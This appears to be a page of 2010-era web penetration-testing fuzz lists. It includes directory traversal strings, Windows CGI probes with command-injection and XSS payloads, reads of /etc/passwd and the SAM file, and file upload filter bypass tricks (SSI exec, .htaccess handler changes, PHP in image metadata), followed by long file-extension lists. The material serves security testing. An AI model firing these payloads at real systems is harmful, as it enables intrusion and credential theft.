.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}
 +
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}
 +
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}
 +
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}
 +
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}
 +
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}
 +
./../{FILE}
 +
./.././../{FILE}
 +
./.././.././../{FILE}
 +
./.././.././.././../{FILE}
 +
./.././.././.././.././../{FILE}
 +
./.././.././.././.././.././../{FILE}
 +
./.././.././.././.././.././.././../{FILE}
 +
./.././.././.././.././.././.././.././../{FILE}
 +
.\..\{FILE}
 +
.\..\.\..\{FILE}
 +
.\..\.\..\.\..\{FILE}
 +
.\..\.\..\.\..\.\..\{FILE}
 +
.\..\.\..\.\..\.\..\.\..\{FILE}
 +
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
 +
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
 +
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
 +
.//..//{FILE}
 +
.//..//.//..//{FILE}
 +
.//..//.//..//.//..//{FILE}
 +
.//..//.//..//.//..//.//..//{FILE}
 +
.//..//.//..//.//..//.//..//.//..//{FILE}
 +
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
 +
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
 +
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
 +
.\\..\\{FILE}
 +
.\\..\\.\\..\\{FILE}
 +
.\\..\\.\\..\\.\\..\\{FILE}
 +
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
 +
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
 +
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
 +
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
 +
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
 +
../{FILE}
 +
../..//{FILE}
 +
../..//../{FILE}
 +
../..//../..//{FILE}
 +
../..//../..//../{FILE}
 +
../..//../..//../..//{FILE}
 +
../..//../..//../..//../{FILE}
 +
../..//../..//../..//../..//{FILE}
 +
..\{FILE}
 +
..\..\\{FILE}
 +
..\..\\..\{FILE}
 +
..\..\\..\..\\{FILE}
 +
..\..\\..\..\\..\{FILE}
 +
..\..\\..\..\\..\..\\{FILE}
 +
..\..\\..\..\\..\..\\..\{FILE}
 +
..\..\\..\..\\..\..\\..\..\\{FILE}
 +
..///{FILE}
 +
../..///{FILE}
 +
../..//..///{FILE}
 +
../..//../..///{FILE}
 +
../..//../..//..///{FILE}
 +
../..//../..//../..///{FILE}
 +
../..//../..//../..//..///{FILE}
 +
../..//../..//../..//../..///{FILE}
 +
..\\\{FILE}
 +
..\..\\\{FILE}
 +
..\..\\..\\\{FILE}
 +
..\..\\..\..\\\{FILE}
 +
..\..\\..\..\\..\\\{FILE}
 +
..\..\\..\..\\..\..\\\{FILE}
 +
..\..\\..\..\\..\..\\..\\\{FILE}
 +
..\..\\..\..\\..\..\\..\..\\\{FILE}
 +
</pre>
 +
 +
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===
 +
<pre># Common Windows CGI  (Update: 17 March 2010)
 +
# fuzz inside executable directories
 +
# on windows, this is usually /scripts or /cgi-bin
 +
 +
 +
cart32.exe
 +
get32.exe
 +
visadmin.exe
 +
foxweb.exe
 +
webplus.exe?about
 +
fpsrvadm.exe
 +
MsmMask.exe
 +
cmd.exe?/c+dir
 +
cmd1.exe?/c+dir
 +
post32.exe|dir%20c:\\
 +
cgitest.exe
 +
hpnst.exe?c=p+i=
 +
Pbcgi.exe
 +
testcgi.exe
 +
webfind.exe?keywords=01234567890123456789
 +
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C
 +
test-cgi.exe?<script>alert(document.cookie)</script>
 +
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
 +
mkilog.exe
 +
mkplog.exe
 +
MsmMask.exe?mask=/junk334
 +
MsmMask.exe?mask=/junk334
 +
MsmMask.exe?mask=/junk334
 +
MsmMask.exe?mask=/junk334
 +
MsmMask.exe?mask=/junk334
 +
perl.exe?-v
 +
perl.exe
 +
ppdscgi.exe
 +
c32web.exe/ChangeAdminPassword
 +
windmail.exe
 +
dbmlparser.exe
 +
cgimail.exe
 +
minimal.exe
 +
rguest.exe
 +
visitor.exe
 +
webbbs.exe
 +
wguest.exe
 +
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
 +
cfgwiz.exe
 +
Cgitest.exe
 +
mailform.exe
 +
post16.exe
 +
imagemap.exe
 +
htimage.exe/path/filename?2,2
 +
htimage.exe
 +
Webnews.exe
 +
texis.exe/junk
 +
apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
 +
sensepost.exe?/c+dir
 +
testcgi.exe
 +
testcgi.exe?<script>alert(document.cookie)</script>
 +
ion-p.exe?page=c:\winnt\repair\sam
 +
../../../../../../../../../../WINNT/system32/ipconfig.exe
 +
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
 +
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
 +
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf
 +
foxweb.dll
 +
wconsole.dll
 +
shtml.dll
 +
scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]
 +
rightfax/fuwww.dll/?
 +
WINDMAIL.EXE?%20-n%20c:\boot.ini%
 +
WINDMAIL.EXE?%20-n%20c:\boot.ini%[email protected]%20|%20dir%20c:\\
 +
GW5/GWWEB.EXE
 +
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
 +
GW5/GWWEB.EXE?HELP=bad-request
 +
GWWEB.EXE?HELP=bad-request
 +
echo.bat
 +
echo.bat?&dir+c:\\
 +
hello.bat?&dir+c:\\
 +
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
 +
input2.bat?|dir
 +
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
 +
test-cgi.bat
 +
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
 +
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
 +
</pre>
 +
 +
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===
 +
<pre># File Upload Fuzzfile - File Name Filter Bypass
 +
 +
# released under creative commons license
 +
 +
# For MIME filter bypass, your shellscript should look like
 +
# -------
 +
# GIF89aP;
 +
# [shell]
 +
# -------
 +
#
 +
# For mod_cgi Server Side Include upload attacks
 +
#
 +
#<!--#exec cmd="ls" -->
 +
#
 +
#or, on Windows
 +
#
 +
#<!--#exec cmd="dir" -->
 +
#
 +
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.
 +
#
 +
# example .htaccess that sets mime type .jpg to be executable:
 +
# -----
 +
# AddType application/x-httpd-php .jpg
 +
# -----
 +
</pre>
 +
 +
=== File Upload Filter Bypass - Generic (Update: 6 April 2010) ===
 +
 +
# released under creative commons license
 +
#
 +
%00index.html
 +
;index.html
 +
</pre>
 +
 +
=== File Upload Filter Bypass - PHP Specific (Update: 6 April 2010) ===
 +
 +
# released under creative commons license
 +
#
 +
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:
 +
# -----
 +
#<?php phpinfo(); ?>
 +
#-----
 +
{PHPSCRIPT}
 +
{PHPSCRIPT}.phtml
 +
{PHPSCRIPT}.php.html
 +
{PHPSCRIPT}.php.php.rar
 +
{PHPSCRIPT}.php.rar
 +
# PHP on Windows
 +
{PHPSCRIPT}.php::$DATA
 +
</pre>
 +
 +
=== File Upload Filter Bypass - Microsoft Specific (Update: 6 April 2010) ===
 +
 +
# released under creative commons license
 +
#
 +
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:
 +
# -----
 +
#<?php phpinfo(); ?>
 +
#-----
 +
{PHPSCRIPT}
 +
{PHPSCRIPT}.phtml
 +
{PHPSCRIPT}.php.html
 +
{PHPSCRIPT}.php::$DATA
 +
{PHPSCRIPT}.php.php.rar
 +
{PHPSCRIPT}.php.rar
 +
</pre>
 +
 +
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===
 +
<pre># Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010
 +
 +
# released under creative commons license
 +
 +
%00index.html
 +
;index.html
 +
</pre>
 +
 +
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===
 +
<pre># PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes
 +
 +
# released under creative commons license
 +
# also: use "gim" to create a .jpg image with the meta comment field set to:
 +
# -----
 +
#<?php phpinfo(); ?>
 +
#-----
 +
 +
{PHPSCRIPT}
 +
{PHPSCRIPT}.phtml
 +
{PHPSCRIPT}.php.html
 +
{PHPSCRIPT}.php::$DATA
 +
{PHPSCRIPT}.php.php.rar
 +
{PHPSCRIPT}.php.rar
 +
{PHPSCRIPT}.php.doc
 +
{PHPSCRIPT}.php.xls
 +
{PHPSCRIPT}.php.xlsx
 +
{PHPSCRIPT}.php.pdf
 +
{PHPSCRIPT}.php.jpeg
 +
{PHPSCRIPT}.php.gif
 +
{PHPSCRIPT}.php.zip
 +
</pre>
 +
 +
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===
 +
<pre># Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009
 +
 +
# released under creative commons license
 +
 +
{ASPSCRIPT}
 +
{ASPSCRIPT};
 +
{ASPSCRIPT};.jpg
 +
{ASPSCRIPT};.pdf
 +
{ASPSCRIPT};.html
 +
{ASPSCRIPT};.htm
 +
{ASPSCRIPT};.txt
 +
{ASPSCRIPT};.xyz
 +
{ASPSCRIPT};.zip
 +
{ASPSCRIPT};.tgz
 +
{ASPSCRIPT};.doc
 +
{ASPSCRIPT};.docx
 +
{ASPSCRIPT};.xls
 +
{ASPSCRIPT};.xlsx
 +
</pre>
 +
 +
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 10 April 2010 - Total Statements: 9)  ===
 +
<pre>#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010)
 +
 +
# released under creative commons license
 +
 +
{PREFIX}/templates_compiled/
 +
{PREFIX}/templates_c/
 +
{PREFIX}/templates/
 +
{PREFIX}/temporary/
 +
{PREFIX}/images/
 +
{PREFIX}/cache/
 +
{PREFIX}/temp/
 +
{PREFIX}/files/
 +
{PREFIX}/tmp/
 +
 +
</pre>
 +
 +
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===
 +
<pre>
 +
#Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863
 +
 +
# released under creative commons license
 +
 +
<pre>
 +
.$er
 +
.123
 +
.1pe
 +
.1ph
 +
.3dr
 +
.3dt
 +
.3me
 +
.3pe
 +
.4dl
 +
.4dv
 +
.8xk
 +
.^^^
 +
.a3l
 +
.a3m
 +
.a3w
 +
.a4l
 +
.a4m
 +
.a4w
 +
.a5l
 +
.a5w
 +
.a65
 +
.aao
 +
.ab
 +
.ab1
 +
.ab2
 +
.ab3
 +
.abcd
 +
.abi
 +
.abp
 +
.aby
 +
.aca
 +
.acc
 +
.accdb
 +
.acf
 +
.acg
 +
.ade
 +
.adp
 +
.adt
 +
.adx
 +
.aft
 +
.agd
 +
.aifb
 +
.alc
 +
.ald
 +
.ali
 +
.amb
 +
.amsorm
 +
.an1
 +
.anme
 +
.apr
 +
.arc
 +
.arh
 +
.ask
 +
.asm
 +
.ast
 +
.at5
 +
.att
 +
.aw
 +
.awg
 +
.azw
 +
.bafl
 +
.bci
 +
.bcm
 +
.bdf
 +
.bdic
 +
.bfx
 +
.bgl
 +
.bgt
 +
.bin
 +
.bjo
 +
.bk
 +
.bkk
 +
.blb
 +
.bld
 +
.blg
 +
.bok
 +
.box
 +
.brd
 +
.brw
 +
.btf
 +
.btif
 +
.btm
 +
.btr
 +
.cap
 +
.cat
 +
.cbg
 +
.cch
 +
.ccr
 +
.cct
 +
.cdb
 +
.cdd
 +
.cdf
 +
.cdp
 +
.cdr
 +
.cdx
 +
.cel
 +
.celtx
 +
.chg
 +
.chk
 +
.chn
 +
.ckd
 +
.ckt
 +
.cl2
 +
.cl4
 +
.clb
 +
.clix
 +
.clm
 +
.clp
 +
.cmbl
 +
.cna
 +
.contact
 +
.cpi
 +
.cpmz
 +
.crd
 +
.crtx
 +
.csa
 +
.csv
 +
.ctf
 +
.ctt
 +
.cursorfx
 +
.curxptheme
 +
.cvd
 +
.cvn
 +
.cwk
 +
.cws
 +
.cwz
 +
.cxt
 +
.cyo
 +
.cys
 +
.daf
 +
.dal
 +
.dam
 +
.das
 +
.dat
 +
.data
 +
.db
 +
.db2
 +
.db3
 +
.dbc
 +
.dbd
 +
.dbf
 +
.dbx
 +
.dcf
 +
.dcl
 +
.dcm
 +
.dcmd
 +
.ddc
 +
.ddcx
 +
.ddt
 +
.dem
 +
.des
 +
.dex
 +
.dfm
 +
.dfproj
 +
.dft
 +
.dgb
 +
.dif
 +
.dii
 +
.dlg
 +
.dm2
 +
.dmo
 +
.dmsk
 +
.dnc
 +
.dockzip
 +
.dp1
 +
.dpn
 +
.dpx
 +
.drl
 +
.dsb
 +
.dsd
 +
.dsk
 +
.dsy
 +
.dsz
 +
.dt0
 +
.dt1
 +
.dt2
 +
.dta
 +
.dtr
 +
.dvdproj
 +
.dvo
 +
.dwi
 +
.e00
 +
.eap
 +
.ebuild
 +
.ec0
 +
.eco
 +
.ecx
 +
.edb
 +
.edf
 +
.eep
 +
.efx
 +
.egp
 +
.emb
 +
.emd
 +
.emlxpart
 +
.enc
 +
.enw
 +
.epp
 +
.epub
 +
.epw
 +
.er1
 +
.esp
 +
.ess
 +
.est
 +
.esx
 +
.et
 +
.eta
 +
.etd
 +
.etl
 +
.ev
 +
.ev3
 +
.evt
 +
.evy
 +
.exif
 +
.exp
 +
.exx
 +
.fa
 +
.fasta
 +
.fbl
 +
.fcd
 +
.fcs
 +
.fdb
 +
.ffd
 +
.ffwp
 +
.fhc
 +
.fid
 +
.fil
 +
.flame
 +
.fll
 +
.flo
 +
.flp
 +
.flt
 +
.fm
 +
.fm5
 +
.fmp
 +
.fo
 +
.fob
 +
.fol
 +
.fop
 +
.fox
 +
.fp
 +
.fp3
 +
.fp4
 +
.fp5
 +
.fp7
 +
.frl
 +
.frm
 +
.fro
 +
.frx
 +
.fsb
 +
.fsc
 +
.ftm
 +
.ftw
 +
.gan
 +
.gbr
 +
.gc
 +
.gcx
 +
.gdb
 +
.ged
 +
.gedcom
 +
.gen
 +
.ggb
 +
.gml
 +
.gms
 +
.gno
 +
.gnp
 +
.gp3
 +
.gpi
 +
.gps
 +
.gpx
 +
.gra
 +
.grade
 +
.grf
 +
.grib
 +
.grk
 +
.grr
 +
.grv
 +
.gs
 +
.gst
 +
.gtp
 +
.gwk
 +
.gxl
 +
.hcc
 +
.hce
 +
.hci
 +
.hcp
 +
.hcr
 +
.hcu
 +
.hda
 +
.hdb
 +
.hdf
 +
.hdi
 +
.hdl
 +
.hif
 +
.hl
 +
.hml
 +
.hmt
 +
.hs2
 +
.hsk
 +
.hst
 +
.htg
 +
.huh
 +
.hyv
 +
.i5z
 +
.ib
 +
.ics
 +
.id2
 +
.idx
 +
.igc
 +
.ihx
 +
.ii
 +
.iif
 +
.img
 +
.imt
 +
.ink
 +
.inp
 +
.ins
 +
.ip
 +
.irock
 +
.irr
 +
.irx
 +
.isf
 +
.itdb
 +
.itl
 +
.itm
 +
.itn
 +
.itw
 +
.itx
 +
.ivt
 +
.iw
 +
.ixb
 +
.jasper
 +
.jdb
 +
.jef
 +
.jmp
 +
.jnt
 +
.job
 +
.joboptions
 +
.joined
 +
.jph
 +
.jrprint
 +
.jrxml
 +
.jude
 +
.kap
 +
.kdb
 +
.kid
 +
.kismac
 +
.kmz
 +
.kpf
 +
.kpp
 +
.kpr
 +
.kpx
 +
.kpz
 +
.l
 +
.l6t
 +
.laccdb
 +
.lbl
 +
.lbx
 +
.lcd
 +
.lcf
 +
.lcm
 +
.ldif
 +
.lex
 +
.lgc
 +
.lgf
 +
.lgh
 +
.lgi
 +
.lgl
 +
.lib
 +
.lif
 +
.livereg
 +
.liveupdate
 +
.lix
 +
.llb
 +
.lms
 +
.lmx
 +
.lnt
 +
.loc
 +
.lp7
 +
.lrf
 +
.lrs
 +
.lrx
 +
.lsf
 +
.lsl
 +
.lsp
 +
.lsr
 +
.lst
 +
.lsu
 +
.lvm
 +
.lw4
 +
.ly
 +
.m
 +
.mag
 +
.mai
 +
.map
 +
.masseffectprofile
 +
.mat
 +
.mbb
 +
.mbf
 +
.mbg
 +
.mbl
 +
.mbp
 +
.mbx
 +
.mc1
 +
.mc9
 +
.mcd
 +
.md
 +
.mdb
 +
.mdc
 +
.mdf
 +
.mdl
 +
.mdm
 +
.mdn
 +
.mdt
 +
.mdx
 +
.mdz
 +
.mem
 +
.menc
 +
.met
 +
.mex
 +
.mfo
 +
.mfp
 +
.mgc
 +
.mls
 +
.mm
 +
.mmap
 +
.mmc
 +
.mmf
 +
.mmp
 +
.mnc
 +
.mng
 +
.mnk
 +
.mno
 +
.mny
 +
.mobi
 +
.moho
 +
.mosaic
 +
.mox
 +
.mpd
 +
.mpj
 +
.mpp
 +
.mpt
 +
.mpx
 +
.mpz
 +
.mq4
 +
.ms10
 +
.mth
 +
.mtw
 +
.mud
 +
.muf
 +
.mw
 +
.mwf
 +
.mws
 +
.mwx
 +
.mxd
 +
.myd
 +
.myi
 +
.nb
 +
.nc
 +
.ndf
 +
.ndk
 +
.ndx
 +
.net
 +
.neta
 +
.nfo
 +
.nitf
 +
.nmind
 +
.not
 +
.notebook
 +
.np
 +
.npl
 +
.npt
 +
.nrl
 +
.ns2
 +
.ns3
 +
.ns4
 +
.nsf
 +
.ntx
 +
.numbers
 +
.nvl
 +
.nyf
 +
.oab
 +
.obj
 +
.odb
 +
.odf
 +
.odp
 +
.ods
 +
.odx
 +
.oeaccount
 +
.ofc
 +
.ofm
 +
.oft
 +
.ofx
 +
.omcs
 +
.omp
 +
.ond
 +
.one
 +
.oo3
 +
.opf
 +
.opx
 +
.or2
 +
.or3
 +
.or4
 +
.or5
 +
.or6
 +
.org
 +
.orx
 +
.otf
 +
.otl
 +
.otln
 +
.ots
 +
.out
 +
.ov2
 +
.ova
 +
.ovf
 +
.p96
 +
.p97
 +
.pab
 +
.paf
 +
.pan
 +
.pbd
 +
.pc
 +
.pcap
 +
.pcb
 +
.pcr
 +
.pd4
 +
.pd5
 +
.pdas
 +
.pdb
 +
.pdd
 +
.pdm
 +
.pds
 +
.pdx
 +
.peb
 +
.pec
 +
.pep
 +
.pex
 +
.pfc
 +
.pfl
 +
.phb
 +
.phm
 +
.pi
 +
.pis
 +
.pjx
 +
.pka
 +
.pkb
 +
.pkh
 +
.pks
 +
.pkt
 +
.pln
 +
.plw
 +
.pmo
 +
.pmr
 +
.pnproj
 +
.pnpt
 +
.pns
 +
.pnt
 +
.pod
 +
.poi
 +
.pos
 +
.postal
 +
.pot
 +
.potm
 +
.potx
 +
.pp2
 +
.ppf
 +
.pps
 +
.ppsx
 +
.ppt
 +
.pptm
 +
.pptx
 +
.prc
 +
.pre
 +
.prf
 +
.prj
 +
.prm
 +
.prs
 +
.psa
 +
.psf
 +
.psm
 +
.pst
 +
.ptb
 +
.ptf
 +
.ptk
 +
.ptm
 +
.ptn
 +
.ptt
 +
.ptz
 +
.pvl
 +
.pwd
 +
.pxj
 +
.pxl
 +
.q07
 +
.q08
 +
.q09
 +
.q3d
 +
.qbw
 +
.qdat
 +
.qdf
 +
.qdfm
 +
.qel
 +
.qfx
 +
.qif
 +
.qpb
 +
.qpf
 +
.qph
 +
.qpm
 +
.qpw
 +
.qrp
 +
.qsd
 +
.ral
 +
.rbt
 +
.rcd
 +
.rcg
 +
.rdb
 +
.rdf
 +
.rdx
 +
.ref
 +
.ret
 +
.rf1
 +
.rfa
 +
.rfo
 +
.rge
 +
.rgn
 +
.rgo
 +
.rmuf
 +
.rnq
 +
.rod
 +
.rog
 +
.roi
 +
.rou
 +
.rpp
 +
.rpt
 +
.rrt
 +
.rsc
 +
.rsd
 +
.rsw
 +
.rte
 +
.rvt
 +
.rwg
 +
.rzb
 +
.s85
 +
.saf
 +
.sam07
 +
.sar
 +
.sav
 +
.sbd
 +
.sbf
 +
.sbq
 +
.sbt
 +
.sca
 +
.scf
 +
.sch
 +
.sdb
 +
.sdc
 +
.sdf
 +
.sdp
 +
.sdq
 +
.sds
 +
.sen
 +
.seo
 +
.seq
 +
.ser
 +
.sgml
 +
.sgn
 +
.shp
 +
.shs
 +
.shx
 +
.skc
 +
.skv
 +
.skx
 +
.sle
 +
.slk
 +
.slp
 +
.snapfireshow
 +
.sonic
 +
.soundpack
 +
.spo
 +
.sps
 +
.spub
 +
.spv
 +
.sq
 +
.sqd
 +
.sql
 +
.sqlite
 +
.sqr
 +
.sta
 +
.stc
 +
.stf
 +
.stk
 +
.stl
 +
.stm
 +
.stp
 +
.str
 +
.stt
 +
.stw
 +
.styk
 +
.stykz
 +
.swk
 +
.sxc
 +
.sxi
 +
.sy3
 +
.t01
 +
.t02
 +
.t03
 +
.t04
 +
.t05
 +
.t06
 +
.t07
 +
.t08
 +
.t09
 +
.t2
 +
.t3001
 +
.tax2008
 +
.tax2009
 +
.tb
 +
.tbk
 +
.tbl
 +
.tcc
 +
.tcx
 +
.tda
 +
.tdl
 +
.tdm
 +
.tdt
 +
.te
 +
.te3
 +
.teacher
 +
.tef
 +
.tet
 +
.tfa
 +
.tfd
 +
.tfrd
 +
.tjp
 +
.tk3
 +
.tkfl
 +
.tmw
 +
.tol
 +
.topc
 +
.tpb
 +
.tps
 +
.tr3
 +
.tra
 +
.trd
 +
.trk
 +
.trs
 +
.trx
 +
.tst
 +
.tsv
 +
.ttk
 +
.txa
 +
.txd
 +
.txf
 +
.uccapilog
 +
.ud
 +
.udb
 +
.udeb
 +
.uds
 +
.ulf
 +
.ulz
 +
.update
 +
.upoi
 +
.usr
 +
.uvf
 +
.uwl
 +
.val
 +
.vbpf1
 +
.vcd
 +
.vce
 +
.vcf
 +
.vcs
 +
.vdb
 +
.vdx
 +
.vfs
 +
.vi
 +
.vip
 +
.vle
 +
.vlg
 +
.vmt
 +
.voi
 +
.vok
 +
.vrd
 +
.vscontent
 +
.vsx
 +
.vtx
 +
.vxml
 +
.w02
 +
.wab
 +
.wb1
 +
.wb2
 +
.wb3
 +
.wdb
 +
.wdq
 +
.wea
 +
.wfd
 +
.wfm
 +
.wgp
 +
.wgt
 +
.windowslivecontact
 +
.wjr
 +
.wk1
 +
.wk2
 +
.wk3
 +
.wk4
 +
.wk5
 +
.wke
 +
.wki
 +
.wks
 +
.wku
 +
.wlmp
 +
.wmdb
 +
.wor
 +
.wpc
 +
.wpf
 +
.wpo
 +
.wq1
 +
.wq2
 +
.wtb
 +
.wtr
 +
.xbk
 +
.xdb
 +
.xdp
 +
.xds
 +
.xef
 +
.xem
 +
.xfd
 +
.xfo
 +
.xft
 +
.xl
 +
.xlc
 +
.xlgc
 +
.xlr
 +
.xls
 +
.xlsb
 +
.xlsm
 +
.xlsx
 +
.xlt
 +
.xltm
 +
.xltx
 +
.xlw
 +
.xmcd
 +
.xml
 +
.xmlper
 +
.xmpz
 +
.xpg
 +
.xpj
 +
.xpm
 +
.xpt
 +
.xrp
 +
.xsl
 +
.xslt
 +
.xsn
 +
.xtm
 +
.xtp
 +
.xxd
 +
.yam
 +
.zap
 +
.zdb
 +
.zdc
 +
.zix
 +
.zmc
 +
.zpl
 +
.{pb
 +
.~hm
 +
</pre>
 +
 +
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===
 +
<pre>
 +
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)
 +
 +
# creative commons
 +
 +
.0
 +
.000
 +
.7z
 +
.a00
 +
.a01
 +
.a02
 +
.ace
 +
.ain
 +
.alz
 +
.apz
 +
.ar
 +
.arc
 +
.arh
 +
.ari
 +
.arj
 +
.ark
 +
.axx
 +
.b64
 +
.ba
 +
.bh
 +
.boo
 +
.bz
 +
.bz2
 +
.bzip
 +
.bzip2
 +
.c00
 +
.c01
 +
.c02
 +
.car
 +
.cb7
 +
.cbr
 +
.cbt
 +
.cbz
 +
.cp9
 +
.cpgz
 +
.cpt
 +
.dar
 +
.dd
 +
.deb
 +
.dgc
 +
.dist
 +
.ecs
 +
.efw
 +
.epi
 +
.f
 +
.fdp
 +
.gca
 +
.gz
 +
.gzi
 +
.gzip
 +
.ha
 +
.hbc
 +
.hbc2
 +
.hbe
 +
.hki
 +
.hki1
 +
.hki2
 +
.hki3
 +
.hpk
 +
.hyp
 +
.ice
 +
.ipg
 +
.ipk
 +
.ish
 +
.j
 +
.jar.pack
 +
.jgz
 +
.jic
 +
.kgb
 +
.lbr
 +
.lemon
 +
.lha
 +
.lnx
 +
.lqr
 +
.lz
 +
.lzh
 +
.lzm
 +
.lzma
 +
.lzo
 +
.lzx
 +
.md
 +
.mint
 +
.mou
 +
.mpkg
 +
.mzp
 +
.oar
 +
.p7m
 +
.pack.gz
 +
.package
 +
.pae
 +
.pak
 +
.paq6
 +
.paq7
 +
.paq8
 +
.par
 +
.par2
 +
.pbi
 +
.pcv
 +
.pea
 +
.pet
 +
.pf
 +
.pim
 +
.pit
 +
.piz
 +
.pkg
 +
.pup
 +
.puz
 +
.pwa
 +
.qda
 +
.r0
 +
.r00
 +
.r01
 +
.r02
 +
.r03
 +
.r1
 +
.r2
 +
.r30
 +
.rar
 +
.rev
 +
.rk
 +
.rnc
 +
.rp9
 +
